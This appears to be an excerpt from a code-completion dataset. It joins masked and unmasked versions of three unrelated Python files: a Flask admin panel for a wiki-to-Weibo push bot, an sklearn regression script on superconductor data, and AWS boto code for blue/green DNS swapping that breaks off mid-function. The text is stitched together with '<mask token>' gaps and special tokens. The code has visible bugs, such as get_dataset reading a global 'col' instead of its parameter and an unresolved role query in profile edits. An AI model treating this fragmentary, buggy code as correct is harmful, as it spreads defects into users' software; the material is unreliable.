current_user.username == username or is_admin is True:\n user_info = User.query.filter_by(username=username, deleted=False\n ).first()\n if not user_info:\n abort(404)\n return render_template('main/user.html', u=user_info, username=\n user_info.username)\n else:\n abort(403)\n\n\nclass UserList(MethodView):\n decorators = [login_required, admin_required]\n\n def __init__(self):\n self.form = AddUserForm\n\n def get(self):\n userlist = User.query.filter_by(deleted=False).all()\n return render_template('main/userlist.html', userlist=userlist,\n form=self.form())\n\n def post(self):\n data = request.get_json()\n if data:\n if data['action'] == 'edit':\n username = data['username']\n else:\n username = data['username']\n try:\n User.query.filter_by(username=username, deleted=False\n ).first().delete()\n except:\n flash(u'用户不存在')\n return jsonify({'status': 302, 'location': url_for(\n 'main.editprofile', username=username)})\n elif request.form:\n self.add_user()\n return redirect('userlist')\n\n def add_user(self):\n form = self.form(request.form)\n if form.validate():\n role = Role.query.filter_by(name=form.role.data).first()\n if role:\n if not User.query.filter_by(email=form.email.data).first():\n user = User(email=form.email.data, username=form.\n username.data, role=role, password=form.password.data)\n user.save()\n else:\n flash(u'已经存在该用户')\n else:\n flash(u'不存在该用户组')\n return redirect(url_for('main.userlist'))\n\n\nclass EditProfile(MethodView):\n decorators = [login_required]\n\n def __init__(self):\n self.form = EditProfileForm\n self.admin_form = AdminEditProfileForm\n\n def get(self, username):\n if not username:\n form = self.form()\n form.email.data = current_user.email\n form.about_me.data = current_user.aboutme\n elif current_user.can(Permission.ADMINISTER):\n user_info = User.query.filter_by(username=username, deleted=False\n ).first()\n if user_info:\n form = self.admin_form()\n form.email.data = user_info.email\n form.about_me.data = user_info.aboutme\n form.role.data = user_info.role.name\n else:\n flash(u'用户不存在')\n return redirect(url_for('main.index'))\n else:\n abort(403)\n return render_template('main/edit_profile.html', form=form, u=\n current_user)\n\n def post(self, username):\n if not username:\n form = self.form(request.form)\n user = current_user\n elif current_user.can(Permission.ADMINISTER):\n form = self.form(request.form)\n user = User.query.filter_by(username=username, deleted=False\n ).first()\n if user:\n if not current_user.verify_password(form.oripassword.data):\n flash(u'管理员密码输入错误')\n return redirect(url_for('main.editprofile', username=\n username))\n else:\n flash(u'用户不存在')\n return redirect(url_for('main.index'))\n else:\n abort(403)\n self.change_profile(user, form, True if username else False)\n return redirect(url_for('main.user', username=username))\n\n @staticmethod\n def change_profile(user, form, admin=False):\n user.password = form.password.data\n user.email = form.email.data\n user.aboutme = form.about_me.data\n if admin:\n new_role = Role.query.filter_by(name=form.role.data)\n if new_role:\n user.role = new_role\n user.save()\n\n\nclass OperationLog(MethodView):\n decorators = [login_required, admin_required]\n\n def get(self, page):\n per_page = 10\n count = UserOperation.query.count()\n query = UserOperation.query.order_by(UserOperation.id.desc()).paginate(\n page=page, per_page=per_page, error_out=False)\n foot_bar = PaginationBar(css_framework='bootstrap3', link_size='sm',\n show_single_page=False, page=page, per_page=per_page, total=\n count, format_total=True, format_number=True)\n return render_template('main/log.html', records=query.items, page=\n page, per_page=per_page, pagination=foot_bar, Operation=Operation)\n\n\nclass KeywordBan(MethodView):\n decorators = [login_required, admin_required]\n\n def __init__(self):\n self.form = BanKeywordForm\n\n def get(self, page):\n per_page = 10\n count = BanList.query.filter_by(deleted=False).count()\n pagination = BanList.query.filter_by(deleted=False).paginate(page=\n page, per_page=per_page, error_out=False)\n foot_bar = PaginationBar(css_framework='bootstrap3', link_size='sm',\n show_single_page=False, page=page, per_page=per_page, total=\n count, format_total=True, format_number=True)\n template_param = {'keywords': pagination.items, 'page': page,\n 'per_page': per_page, 'pagination': foot_bar, 'form': self.form()}\n return render_template('main/ban.html', **template_param)\n\n def post(self, page):\n data = request.get_json()\n if data:\n keyword = data['keyword']\n result = BanList.query.filter_by(rule=keyword).first()\n if result:\n if result.status:\n result.status.delete()\n result.delete()\n flash(u'成功删除关键词')\n else:\n flash(u'该关键词不存在')\n return jsonify({'status': 302, 'location': url_for('main.ban')})\n elif request.form:\n form = self.form(request.form)\n if form.validate():\n exist = BanList.query.filter_by(rule=form.keyword.data).first()\n if not exist:\n ban = BanList(rule=form.keyword.data, time_limit=form.\n time_limit.data)\n ban.save()\n status = RulePushCount(rule_id=ban.id, count=ban.time_limit\n )\n status.save()\n flash(u'添加关键词成功')\n elif exist.deleted is True:\n exist.deleted = False\n exist.time_limit = form.time_limit.data\n exist.save()\n status = RulePushCount(rule_id=exist.id, count=exist.\n time_limit)\n status.save()\n else:\n flash(u'重复添加关键词')\n return redirect(url_for('main.ban'))\n\n\nclass WeiboAuthCallback(MethodView):\n decorators = [login_required, admin_required]\n\n def get(self):\n self.auth_code = request.args.get('code')\n result = self.fresh_access()\n if result is True:\n return render_template('main/success.html')\n else:\n return render_template('main/failed.html', e=result)\n\n def fresh_access(self):\n try:\n pass\n except BaseException as e:\n return e\n return True\n\n\nclass Cookie(MethodView):\n decorators = [login_required, admin_required]\n\n def __init__(self):\n self.form = CookieForm\n\n def get(self):\n return render_template('main/cookie.html', form=self.form(),\n pushtime=10)\n\n def post(self):\n form = self.form(request.form)\n if not form.validate():\n flash(u'表单不合法')\n cookie = form.cookie.data\n env = Env()\n env.set('COOKIE', cookie)\n flash(u'设置 Cookie 成功')\n return redirect(url_for('main.cookie'))\n",
"step-5": "# -*- coding: utf-8 -*-\n\nimport urllib\nfrom urllib2 import HTTPError\nfrom datetime import datetime\nfrom flask.views import MethodView\nfrom flask.ext.login import current_user, login_required\nfrom flask.ext.paginate import Pagination as PaginationBar\nfrom flask import render_template, redirect, url_for, request, jsonify, flash, current_app, abort\nfrom koushihime.auth.models import UserOperation, User, Role\nfrom koushihime.auth.constants import Permission, Operation\nfrom koushihime.utils import Pagination, admin_required, Env\nfrom koushihime.utils.moegirl import MoegirlQuery, MoegirlImage\nfrom . import main\nfrom utils import recent_have_pushed, have_auto_catched\nfrom models import WaitingQueue, BanList, RulePushCount\nfrom forms import PushForm, AddUserForm, EditProfileForm, AdminEditProfileForm, BanKeywordForm, CookieForm\n\n\n@main.before_request\ndef before_request():\n if current_user.is_anonymous:\n return redirect(url_for('auth.login'))\n elif current_user.is_blocked:\n return render_template('main/auth/block.html')\n else:\n current_user.last_seen = datetime.utcnow()\n current_user.save()\n\n\nclass Index(MethodView):\n\n def get(self):\n if not current_user:\n return redirect(url_for(\"auth.login\"))\n config = current_app.config[\"WEIBO_AUTH_CONFIG\"]\n callback = urllib.quote(config[\"CALLBACK\"])\n app_key = config[\"APP_KEY\"]\n return render_template('main/index.html', callback=callback, app_key=app_key)\n\n\nclass Update(MethodView):\n decorators = [login_required]\n\n def get(self, page):\n per_page = 10\n unpushed_entry = WaitingQueue.query.order_by(WaitingQueue.cutting_weight.desc()).all()\n pagination = Pagination(unpushed_entry, per_page)\n current_page = pagination.page(page)\n foot_bar = PaginationBar(css_framework='bootstrap3', link_size='sm',\n show_single_page=True, page=page,\n per_page=per_page, total=len(unpushed_entry),\n format_total=True, format_number=True)\n result = {\n \"titles\": current_page,\n \"current_time\": datetime.utcnow(),\n \"pushtime\": 10,\n \"deltime\": 999,\n \"page\": page,\n \"per_page\": per_page,\n \"pagination\": foot_bar\n }\n return render_template('main/update.html', **result)\n\n def post(self, page):\n data = request.get_json()\n if data['action'] == 'post':\n title = data[\"title\"]\n env = Env()\n current_weight = env.get(\"CUTTING_WEIGHT_INIT\")\n entry = WaitingQueue.query.filter_by(title=title).first()\n if entry:\n entry.cutting_weight = current_weight + 1 # FIXME: 即使条目处于权重最高状态亦可增加权限\n entry.save()\n env.set(\"CUTTING_WEIGHT_INIT\", entry.cutting_weight)\n elif data['action'] == 'del':\n title = data['title']\n UserOperation(user_id=current_user.id, operation=Operation.DELETE, title=title).save()\n query = WaitingQueue.query.filter_by(title=data['title']).first()\n if query:\n query.delete()\n response = jsonify({'result': True})\n return response\n\n\nclass ManualUpdate(MethodView):\n decorators = [login_required]\n\n def __init__(self):\n self.form = PushForm\n\n def get(self):\n return render_template('main/mupdate.html', form=self.form(), pushtime=10)\n\n def post(self):\n if not current_user.can(Permission.MANUAL_PUSH):\n flash(u\"你没有权限\")\n\n form = self.form(request.form)\n if not form.validate():\n flash(u\"条目格式有问题,请检查并重新填写\")\n\n title = form.pushtitle.data\n result = self.check_push_validate(title.encode(\"utf-8\"))\n if not result:\n flash(u\"推送条目被ban,或者已经在24小时之内推送过,或者已经进入待推送列表\")\n\n try:\n image = MoegirlImage(title)\n except HTTPError as e:\n flash(u\"请求萌百错误,错误码如下{},请联系管理员\".format(e))\n return redirect(url_for('main.mupdate'))\n if not image.path:\n flash(u\"无法取得图片,请重试\")\n\n entry = WaitingQueue(title=title, image=image.path)\n env = Env()\n current_weight = env.get(\"CUTTING_WEIGHT_INIT\")\n entry.cutting_weight = current_weight + 1\n entry.save()\n env.set(\"CUTTING_WEIGHT_INIT\", entry.cutting_weight)\n UserOperation(user_id=current_user.id, title=title, operation=Operation.PUSH).save()\n if form.industry.data:\n try:\n from koushihime.crontab import push\n push()\n except Exception as e:\n flash(u\"推送失败: {}\".format(str(e)))\n flash(u\"操作成功,词条将立即推送\")\n return redirect(url_for('main.mupdate'))\n\n @staticmethod\n def check_push_validate(title):\n moegirl_entry = MoegirlQuery(title)\n namespace = moegirl_entry.get_namespace()\n if namespace is 0:\n baned_from_moegirl = moegirl_entry.banned_moegirl_category()\n baned_from_regex = moegirl_entry.ban_from_regex()\n has_pushed = recent_have_pushed(title.decode(\"utf-8\")) # TODO: 改成自动冒泡\n has_catched = have_auto_catched(title.decode(\"utf-8\"))\n result = baned_from_moegirl is False \\\n and has_pushed is False \\\n and has_catched is False \\\n and baned_from_regex is False\n return result\n else:\n return False\n\n\nclass UserInfo(MethodView):\n decorators = [login_required]\n\n def get(self, username):\n is_admin = current_user.can(Permission.ADMINISTER)\n if current_user.username == username or is_admin is True:\n user_info = User.query.filter_by(username=username, deleted=False).first()\n if not user_info:\n abort(404)\n return render_template('main/user.html', u=user_info, username=user_info.username)\n else:\n abort(403)\n\n\nclass UserList(MethodView):\n decorators = [login_required, admin_required]\n\n def __init__(self):\n self.form = AddUserForm\n\n def get(self):\n userlist = User.query.filter_by(deleted=False).all()\n return render_template('main/userlist.html', userlist=userlist, form=self.form())\n\n def post(self):\n data = request.get_json()\n if data:\n if data['action'] == 'edit':\n username = data['username']\n else:\n username = data['username']\n try:\n User.query.filter_by(username=username, deleted=False).first().delete()\n except:\n flash(u'用户不存在')\n return jsonify({\"status\": 302, \"location\": url_for('main.editprofile', username=username)})\n elif request.form:\n self.add_user()\n return redirect('userlist')\n\n def add_user(self):\n form = self.form(request.form)\n if form.validate():\n role = Role.query.filter_by(name=form.role.data).first()\n if role:\n if not User.query.filter_by(email=form.email.data).first():\n user = User(email=form.email.data, username=form.username.data,\n role=role, password=form.password.data)\n user.save()\n else:\n flash(u'已经存在该用户')\n else:\n flash(u'不存在该用户组')\n return redirect(url_for('main.userlist'))\n\n\nclass EditProfile(MethodView):\n decorators = [login_required]\n\n def __init__(self):\n self.form = EditProfileForm\n self.admin_form = AdminEditProfileForm\n\n def get(self, username):\n if not username: # 用户访问自己的个人信息编辑页\n form = self.form()\n form.email.data = current_user.email\n form.about_me.data = current_user.aboutme\n else:\n if current_user.can(Permission.ADMINISTER):\n user_info = User.query.filter_by(username=username, deleted=False).first()\n if user_info:\n form = self.admin_form()\n form.email.data = user_info.email\n form.about_me.data = user_info.aboutme\n form.role.data = user_info.role.name\n else:\n flash(u'用户不存在')\n return redirect(url_for('main.index'))\n else:\n abort(403)\n return render_template('main/edit_profile.html', form=form, u=current_user)\n\n def post(self, username):\n if not username:\n form = self.form(request.form)\n user = current_user\n else:\n if current_user.can(Permission.ADMINISTER):\n form = self.form(request.form)\n user = User.query.filter_by(username=username, deleted=False).first()\n if user:\n if not current_user.verify_password(form.oripassword.data):\n flash(u'管理员密码输入错误')\n return redirect(url_for('main.editprofile', username=username))\n else:\n flash(u'用户不存在')\n return redirect(url_for('main.index'))\n else:\n abort(403)\n\n self.change_profile(user, form, True if username else False)\n return redirect(url_for('main.user', username=username))\n\n @staticmethod\n def change_profile(user, form, admin=False):\n user.password = form.password.data\n user.email = form.email.data\n user.aboutme = form.about_me.data\n if admin:\n new_role = Role.query.filter_by(name=form.role.data)\n if new_role:\n user.role = new_role\n user.save()\n\n\nclass OperationLog(MethodView):\n decorators = [login_required, admin_required]\n\n def get(self, page):\n per_page = 10\n count = UserOperation.query.count()\n query = UserOperation.query.order_by(UserOperation.id.desc())\\\n .paginate(page=page, per_page=per_page, error_out=False)\n foot_bar = PaginationBar(css_framework='bootstrap3', link_size='sm',\n show_single_page=False, page=page, per_page=per_page,\n total=count, format_total=True, format_number=True)\n return render_template('main/log.html', records=query.items,\n page=page, per_page=per_page, pagination=foot_bar, Operation=Operation)\n\n\nclass KeywordBan(MethodView):\n decorators = [login_required, admin_required]\n\n def __init__(self):\n self.form = BanKeywordForm\n\n def get(self, page):\n per_page = 10\n count = BanList.query.filter_by(deleted=False).count()\n # TODO: 把关键词读入配置减少查询次数\n pagination = BanList.query.filter_by(deleted=False)\\\n .paginate(page=page, per_page=per_page, error_out=False)\n foot_bar = PaginationBar(css_framework='bootstrap3', link_size='sm',\n show_single_page=False, page=page, per_page=per_page,\n total=count, format_total=True, format_number=True)\n template_param = {\n 'keywords': pagination.items,\n 'page': page,\n 'per_page': per_page,\n 'pagination': foot_bar,\n 'form': self.form()\n }\n return render_template('main/ban.html', **template_param)\n\n def post(self, page):\n data = request.get_json()\n if data:\n keyword = data['keyword']\n result = BanList.query.filter_by(rule=keyword).first()\n if result:\n if result.status:\n result.status.delete()\n result.delete()\n flash(u'成功删除关键词')\n else:\n flash(u'该关键词不存在')\n return jsonify({\"status\": 302, \"location\": url_for('main.ban')})\n elif request.form:\n form = self.form(request.form)\n if form.validate():\n exist = BanList.query.filter_by(rule=form.keyword.data).first()\n if not exist:\n ban = BanList(rule=form.keyword.data, time_limit=form.time_limit.data)\n ban.save()\n status = RulePushCount(rule_id=ban.id, count=ban.time_limit)\n status.save()\n flash(u'添加关键词成功')\n else:\n if exist.deleted is True:\n exist.deleted = False\n exist.time_limit = form.time_limit.data\n exist.save()\n status = RulePushCount(rule_id=exist.id, count=exist.time_limit)\n status.save()\n else:\n flash(u'重复添加关键词')\n return redirect(url_for('main.ban'))\n\n\n# TODO: deprecated\nclass WeiboAuthCallback(MethodView):\n decorators = [login_required, admin_required]\n\n def get(self):\n self.auth_code = request.args.get(\"code\")\n result = self.fresh_access()\n if result is True:\n return render_template('main/success.html')\n else:\n return render_template('main/failed.html', e=result)\n\n def fresh_access(self):\n # config = current_app.config[\"WEIBO_AUTH_CONFIG\"]\n # callback = config[\"CALLBACK\"]\n # app_key = config[\"APP_KEY\"]\n # app_secret_key = config[\"APP_SECRET\"]\n try:\n pass\n # client = APIClient(app_key=app_key, app_secret=app_secret_key, redirect_uri=callback)\n # token_data = client.request_access_token(self.auth_code)\n # access_token, expires_in = token_data.access_token, token_data.expires_in\n except BaseException as e:\n return e\n # config[\"ACCESS_TOKEN\"] = access_token\n # config[\"EXPIRE_TIME\"] = expires_in\n # env = Env()\n # env.set(\"ACCESS_TOKEN\", access_token)\n # env = Env()\n # env.set(\"EXPIRE_TIME\", expires_in)\n return True\n\n\nclass Cookie(MethodView):\n decorators = [login_required, admin_required]\n\n def __init__(self):\n self.form = CookieForm\n\n def get(self):\n return render_template('main/cookie.html', form=self.form(), pushtime=10)\n\n def post(self):\n form = self.form(request.form)\n if not form.validate():\n flash(u\"表单不合法\")\n cookie = form.cookie.data\n env = Env()\n env.set(\"COOKIE\", cookie)\n flash(u\"设置 Cookie 成功\")\n return redirect(url_for('main.cookie'))\n",
"step-ids": [
17,
24,
27,
37,
47
]
}
|
[
17,
24,
27,
37,
47
] |
<|reserved_special_token_0|>
def read_atomic_data(path):
if not path or not os.path.exists(path) or not os.path.isfile(path):
print('To begin with, your path to data should be proper!')
sys.exit(1)
df = pd.read_csv(path)
columns = df.columns.tolist()
columns = columns[:-1]
df = pd.read_csv(path, usecols=columns)
return df, columns
def get_dataset(df, columns):
X = df[col[:-1]]
y = df.critical_temp
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3,
random_state=1)
return X_train, X_test, y_train, y_test
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def read_atomic_data(path):
if not path or not os.path.exists(path) or not os.path.isfile(path):
print('To begin with, your path to data should be proper!')
sys.exit(1)
df = pd.read_csv(path)
columns = df.columns.tolist()
columns = columns[:-1]
df = pd.read_csv(path, usecols=columns)
return df, columns
def get_dataset(df, columns):
X = df[col[:-1]]
y = df.critical_temp
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3,
random_state=1)
return X_train, X_test, y_train, y_test
<|reserved_special_token_0|>
print(dict)
draw.draw(dict, 'r2_score')
draw.draw(dict, 'max_error')
draw.draw(dict, 'explained_variance_score')
draw.draw(dict, 'mean_absolute_error')
draw.draw(dict, 'mean_squared_error')
draw.draw(dict, 'mean_squared_log_error')
draw.draw(dict, 'median_absolute_error')
sys.exit()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def read_atomic_data(path):
if not path or not os.path.exists(path) or not os.path.isfile(path):
print('To begin with, your path to data should be proper!')
sys.exit(1)
df = pd.read_csv(path)
columns = df.columns.tolist()
columns = columns[:-1]
df = pd.read_csv(path, usecols=columns)
return df, columns
def get_dataset(df, columns):
X = df[col[:-1]]
y = df.critical_temp
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3,
random_state=1)
return X_train, X_test, y_train, y_test
df, col = read_atomic_data('unique_m.csv')
X_train, X_test, y_train, y_test = get_dataset(df, col)
<|reserved_special_token_0|>
X_train = preprocessing.scale(X_train)
X_test = preprocessing.scale(X_test)
results = {}
R = Regression(X_train, X_test, y_train, y_test)
dict = R.run()
print(dict)
draw.draw(dict, 'r2_score')
draw.draw(dict, 'max_error')
draw.draw(dict, 'explained_variance_score')
draw.draw(dict, 'mean_absolute_error')
draw.draw(dict, 'mean_squared_error')
draw.draw(dict, 'mean_squared_log_error')
draw.draw(dict, 'median_absolute_error')
sys.exit()
<|reserved_special_token_1|>
import pandas as pd
from sklearn.tree import DecisionTreeClassifier
from sklearn.model_selection import train_test_split
from sklearn import metrics
from sklearn.tree import DecisionTreeRegressor
from sklearn.linear_model import BayesianRidge, LinearRegression
import os
import sys
import sklearn.metrics as mets
from review import set_metrics as set_metrics
from algo import Regression
import draw
def read_atomic_data(path):
if not path or not os.path.exists(path) or not os.path.isfile(path):
print('To begin with, your path to data should be proper!')
sys.exit(1)
df = pd.read_csv(path)
columns = df.columns.tolist()
columns = columns[:-1]
df = pd.read_csv(path, usecols=columns)
return df, columns
def get_dataset(df, columns):
X = df[col[:-1]]
y = df.critical_temp
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3,
random_state=1)
return X_train, X_test, y_train, y_test
df, col = read_atomic_data('unique_m.csv')
X_train, X_test, y_train, y_test = get_dataset(df, col)
from sklearn import preprocessing
X_train = preprocessing.scale(X_train)
X_test = preprocessing.scale(X_test)
results = {}
R = Regression(X_train, X_test, y_train, y_test)
dict = R.run()
print(dict)
draw.draw(dict, 'r2_score')
draw.draw(dict, 'max_error')
draw.draw(dict, 'explained_variance_score')
draw.draw(dict, 'mean_absolute_error')
draw.draw(dict, 'mean_squared_error')
draw.draw(dict, 'mean_squared_log_error')
draw.draw(dict, 'median_absolute_error')
sys.exit()
<|reserved_special_token_1|>
import pandas as pd
from sklearn.tree import DecisionTreeClassifier # Import Decision Tree Classifier
from sklearn.model_selection import train_test_split # Import train_test_split function
from sklearn import metrics #Import scikit-learn metrics module for accuracy calculation
from sklearn.tree import DecisionTreeRegressor
from sklearn.linear_model import BayesianRidge, LinearRegression
import os
import sys
import sklearn.metrics as mets
from review import set_metrics as set_metrics
from algo import Regression
import draw
#https://datascience.stackexchange.com/questions/989/svm-using-scikit-learn-runs-endlessly-and-never-completes-execution
#https://machinelearningmastery.com/time-series-prediction-lstm-recurrent-neural-networks-python-keras/
#https://datascienceplus.com/keras-regression-based-neural-networks/
#xgboost
#random forest
#lstm
#rnn
#dec tree
#logistic regression
#ann
#naive bayes
#monte carlo
def read_atomic_data(path):
if not path or not os.path.exists(path) or not os.path.isfile(path):
print("To begin with, your path to data should be proper!")
sys.exit(1)
df = pd.read_csv(path)
columns = df.columns.tolist() # get the columns
columns = columns[:-1]
df = pd.read_csv(path, usecols=columns)
return df, columns
def get_dataset(df, columns):
X = df[col[:-1]]
y = df.critical_temp
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=1)
return (X_train, X_test, y_train, y_test)
df, col = read_atomic_data("unique_m.csv")
(X_train, X_test, y_train, y_test) = get_dataset(df, col)
from sklearn import preprocessing
X_train = preprocessing.scale(X_train)
X_test = preprocessing.scale(X_test)
results = {}
R = Regression(X_train, X_test, y_train, y_test)
dict = R.run()
print (dict)
draw.draw(dict, 'r2_score')
draw.draw(dict, 'max_error')
draw.draw(dict, 'explained_variance_score')
draw.draw(dict, 'mean_absolute_error')
draw.draw(dict, 'mean_squared_error')
draw.draw(dict, 'mean_squared_log_error')
draw.draw(dict, 'median_absolute_error')
sys.exit()
|
flexible
|
{
"blob_id": "1e34087719f6fd0456d2722edbd0a7af68d37e4c",
"index": 1577,
"step-1": "<mask token>\n\n\ndef read_atomic_data(path):\n if not path or not os.path.exists(path) or not os.path.isfile(path):\n print('To begin with, your path to data should be proper!')\n sys.exit(1)\n df = pd.read_csv(path)\n columns = df.columns.tolist()\n columns = columns[:-1]\n df = pd.read_csv(path, usecols=columns)\n return df, columns\n\n\ndef get_dataset(df, columns):\n X = df[col[:-1]]\n y = df.critical_temp\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3,\n random_state=1)\n return X_train, X_test, y_train, y_test\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef read_atomic_data(path):\n if not path or not os.path.exists(path) or not os.path.isfile(path):\n print('To begin with, your path to data should be proper!')\n sys.exit(1)\n df = pd.read_csv(path)\n columns = df.columns.tolist()\n columns = columns[:-1]\n df = pd.read_csv(path, usecols=columns)\n return df, columns\n\n\ndef get_dataset(df, columns):\n X = df[col[:-1]]\n y = df.critical_temp\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3,\n random_state=1)\n return X_train, X_test, y_train, y_test\n\n\n<mask token>\nprint(dict)\ndraw.draw(dict, 'r2_score')\ndraw.draw(dict, 'max_error')\ndraw.draw(dict, 'explained_variance_score')\ndraw.draw(dict, 'mean_absolute_error')\ndraw.draw(dict, 'mean_squared_error')\ndraw.draw(dict, 'mean_squared_log_error')\ndraw.draw(dict, 'median_absolute_error')\nsys.exit()\n",
"step-3": "<mask token>\n\n\ndef read_atomic_data(path):\n if not path or not os.path.exists(path) or not os.path.isfile(path):\n print('To begin with, your path to data should be proper!')\n sys.exit(1)\n df = pd.read_csv(path)\n columns = df.columns.tolist()\n columns = columns[:-1]\n df = pd.read_csv(path, usecols=columns)\n return df, columns\n\n\ndef get_dataset(df, columns):\n X = df[col[:-1]]\n y = df.critical_temp\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3,\n random_state=1)\n return X_train, X_test, y_train, y_test\n\n\ndf, col = read_atomic_data('unique_m.csv')\nX_train, X_test, y_train, y_test = get_dataset(df, col)\n<mask token>\nX_train = preprocessing.scale(X_train)\nX_test = preprocessing.scale(X_test)\nresults = {}\nR = Regression(X_train, X_test, y_train, y_test)\ndict = R.run()\nprint(dict)\ndraw.draw(dict, 'r2_score')\ndraw.draw(dict, 'max_error')\ndraw.draw(dict, 'explained_variance_score')\ndraw.draw(dict, 'mean_absolute_error')\ndraw.draw(dict, 'mean_squared_error')\ndraw.draw(dict, 'mean_squared_log_error')\ndraw.draw(dict, 'median_absolute_error')\nsys.exit()\n",
"step-4": "import pandas as pd\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import metrics\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.linear_model import BayesianRidge, LinearRegression\nimport os\nimport sys\nimport sklearn.metrics as mets\nfrom review import set_metrics as set_metrics\nfrom algo import Regression\nimport draw\n\n\ndef read_atomic_data(path):\n if not path or not os.path.exists(path) or not os.path.isfile(path):\n print('To begin with, your path to data should be proper!')\n sys.exit(1)\n df = pd.read_csv(path)\n columns = df.columns.tolist()\n columns = columns[:-1]\n df = pd.read_csv(path, usecols=columns)\n return df, columns\n\n\ndef get_dataset(df, columns):\n X = df[col[:-1]]\n y = df.critical_temp\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3,\n random_state=1)\n return X_train, X_test, y_train, y_test\n\n\ndf, col = read_atomic_data('unique_m.csv')\nX_train, X_test, y_train, y_test = get_dataset(df, col)\nfrom sklearn import preprocessing\nX_train = preprocessing.scale(X_train)\nX_test = preprocessing.scale(X_test)\nresults = {}\nR = Regression(X_train, X_test, y_train, y_test)\ndict = R.run()\nprint(dict)\ndraw.draw(dict, 'r2_score')\ndraw.draw(dict, 'max_error')\ndraw.draw(dict, 'explained_variance_score')\ndraw.draw(dict, 'mean_absolute_error')\ndraw.draw(dict, 'mean_squared_error')\ndraw.draw(dict, 'mean_squared_log_error')\ndraw.draw(dict, 'median_absolute_error')\nsys.exit()\n",
"step-5": "import pandas as pd\nfrom sklearn.tree import DecisionTreeClassifier # Import Decision Tree Classifier\nfrom sklearn.model_selection import train_test_split # Import train_test_split function\nfrom sklearn import metrics #Import scikit-learn metrics module for accuracy calculation\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.linear_model import BayesianRidge, LinearRegression\nimport os\nimport sys\nimport sklearn.metrics as mets\nfrom review import set_metrics as set_metrics\nfrom algo import Regression\nimport draw\n#https://datascience.stackexchange.com/questions/989/svm-using-scikit-learn-runs-endlessly-and-never-completes-execution\n#https://machinelearningmastery.com/time-series-prediction-lstm-recurrent-neural-networks-python-keras/\n#https://datascienceplus.com/keras-regression-based-neural-networks/\n\n#xgboost\n#random forest\n#lstm\n#rnn\n#dec tree\n#logistic regression\n#ann\n#naive bayes\n#monte carlo\n\ndef read_atomic_data(path):\n if not path or not os.path.exists(path) or not os.path.isfile(path):\n print(\"To begin with, your path to data should be proper!\")\n sys.exit(1)\n df = pd.read_csv(path)\n columns = df.columns.tolist() # get the columns\n columns = columns[:-1]\n df = pd.read_csv(path, usecols=columns)\n return df, columns\n\ndef get_dataset(df, columns):\n X = df[col[:-1]]\n y = df.critical_temp\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=1) \n return (X_train, X_test, y_train, y_test)\n\ndf, col = read_atomic_data(\"unique_m.csv\")\n(X_train, X_test, y_train, y_test) = get_dataset(df, col)\nfrom sklearn import preprocessing\nX_train = preprocessing.scale(X_train)\nX_test = preprocessing.scale(X_test)\nresults = {}\nR = Regression(X_train, X_test, y_train, y_test)\ndict = R.run()\nprint (dict)\ndraw.draw(dict, 'r2_score')\ndraw.draw(dict, 'max_error')\ndraw.draw(dict, 'explained_variance_score')\ndraw.draw(dict, 'mean_absolute_error')\ndraw.draw(dict, 'mean_squared_error')\ndraw.draw(dict, 'mean_squared_log_error')\ndraw.draw(dict, 'median_absolute_error')\n\nsys.exit()\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
def swap_dns(live_alias, future_value, alias_dns_name, zone, records):
"""
:description: Changes alias (blue.<domain> or green.<domain>) that is behind live url.
:param
live_alias: Your external DNS record pointing to live web server.
future_alias: blue.<domain> or green.<domain> depends which is going to be live.
zone: handle to zone that hosts dns records.
records: sets of dns records from the zone..
:return: Result of the change (AWS respond).
"""
try:
change = records.add_change(action='UPSERT', name=live_alias, ttl=
300, type='A', alias_dns_name=alias_dns_name,
alias_hosted_zone_id=zone.id, alias_evaluate_target_health=False)
change.add_value(future_value)
result = records.commit()
except Exception as ex:
LOGGER.error('Could not swap dns entry for %s. Exception: %s' % (
live_alias, ex))
sys.exit(1)
return result
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def connect_to_aws(region, aws_access_key, aws_secret_key):
"""
:param:
region: AWS region
aws_access_key: AWS Access Key
aws_secret_key: AWS Secret Key
:return: map of aws services and connection handles for them.
"""
ec2_conn = ec2.connect_to_region(region_name=region, aws_access_key_id=
aws_access_key, aws_secret_access_key=aws_secret_key)
route53_conn = route53.Route53Connection(aws_access_key_id=
aws_access_key, aws_secret_access_key=aws_secret_key)
if ec2_conn is None:
logging.error(
'Could not connect to Ec2 with this parameters: %s, %s, <secret key>'
, region, aws_access_key)
sys.exit(1)
else:
logging.info('Connected to AWS EC2 [%s]', region)
if route53_conn is None:
logging.error(
'Could not connect to Route53 with this parameters: %s, <secret key>'
, aws_access_key)
sys.exit(1)
else:
logging.info('Connected to AWS Route53')
return {'ec2': ec2_conn, 'route53': route53_conn}
def get_specific_instances(ec2_conn, tag_key, tag_value, instance_state):
"""
:description: Returns requested instance - uses filters to get it.
:param
ec2_conn: Connections to AWS EC2.
tag_key: Name of the tag.
tag_value: Value of the tag.
instance_state: One of three states - "running" / "pending" / "stopped".
:return: boolean result.
"""
instances = ec2_conn.get_only_instances(filters={'tag:{0}'.format(
tag_key): tag_value, 'instance-state-name': instance_state})
return instances
def create_new_instance(ec2_conn, image_id, ssh_key, sec_group, subnet_id,
env, instance_name, user_data=None, instance_size='t2.micro', shutdown=
'stop', dry_run=False):
"""
:param
ec2_conn: connection to AWS EC2 service
image_id: Amazon Machine Image ID with all your software
ssh_key: AWS key pair name
sec_group: Security group ID that should be allocated
subnet_id: Subnet ID in which your instance should be created
env: Environment (blue / green / old_app)
instance_name: Name tag value
